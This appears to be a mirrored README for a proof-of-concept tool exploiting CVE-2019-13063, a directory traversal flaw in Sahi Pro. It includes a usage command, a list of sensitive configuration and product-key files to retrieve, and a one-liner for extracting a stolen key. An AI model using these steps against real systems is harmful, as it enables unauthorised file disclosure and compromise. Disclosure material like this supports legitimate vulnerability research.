Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-13063 PoC — Tyto Software Sahi Pro 路径遍历漏洞

Source
https://github.com/0x6b7966/CVE-2019-13063-POC
Associated Vulnerability
Title:Tyto Software Sahi Pro 路径遍历漏洞 (CVE-2019-13063)
Description:Within Sahi Pro 8.0.0, an attacker can send a specially crafted URL to include any victim files on the system via the script parameter on the Script_view page. This will result in file disclosure (i.e., being able to pull any file from the remote victim application). This can be used to steal and obtain sensitive config and other files. This can result in complete compromise of the application. The script parameter is vulnerable to directory traversal and both local and remote file inclusion.
Description
Proof of concept tool to exploit the directory traversal and local file inclusion vulnerability that resides in the Sahi-pro web application CVE-2019-13063
Readme
# CVE-2019-13063 Proof of concept
![Python 3](https://img.shields.io/badge/python-3.6-blue.svg)

## About

An issue was discovered in Sahi-pro script manager web-application, there is both a file and directory traversal vulnerability which resides in the ?script= parameter which is found on the /Script_view page of the Sahi-pro webapplication. An attacker can send a specially crafted URL to retrieve and steal sensitive files from the victim.

This is a proof of concept tool to exploit the directory traversal and file traversal vulnerability that resides in the Sahi-pro web application.

**Impact:** Within the Sahi-pro web-application software, there is a directory and file traversal vulnerability which result in the leakage of sensitive information from the application, or it can be used to pull direct systems files.

The ?script= parameter on the script_view page is susceptible to file and directory traversal to list the contents of files.

## Usage

Run it like this:
`$ python3 CVE-2019-13063-POC.py --url http://example:[REDACTED]`
*This will download the applications product key.*

Specify the full URL, including the file you wish to download appended to the vulnerable ?script= parameter.

```
usage: CVE-2019-13063-POC.py [-h] [--url URL]

optional arguments:
  -h, --help  show this help message and exit
  --url URL   Specify the vulnerable URL

```

## Sensitive files which may lead to direct application compromise

```
Sahi User properties file - \sahi_pro\userdata\config\userdata.properties
Sahi data profile - \sahi_pro\userdata\browser\ff\profiles\sahi0\prefs.js
Sahi properties file - \sahi_pro\config\sahi.properties
Sahi Product key location - \config\productkey.txt
```

## Other 

This script will just attempt to download the entire page, you could easily parse out the wanted content from the page since it is between the unique `<ol><li>` HTML parameters with a simple bash one liner.
  
Example to parse out the product key: 
 
```
cat output.txt | grep "<ol><li>" | cut -d ">" -f3 | cut -d "<" -f1

1a79a4d60de6718e8e5b326e338ae533
```
File Snapshot

 [4.0K]  /data/pocs/cb97aeaa9bb6e6bd1b70a638bb863a5d40bff95c
├── [ 888]  CVE-2019-13063-POC.py
├── [ 34K]  LICENSE
├── [2.0K]  README.md
└── [   9]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →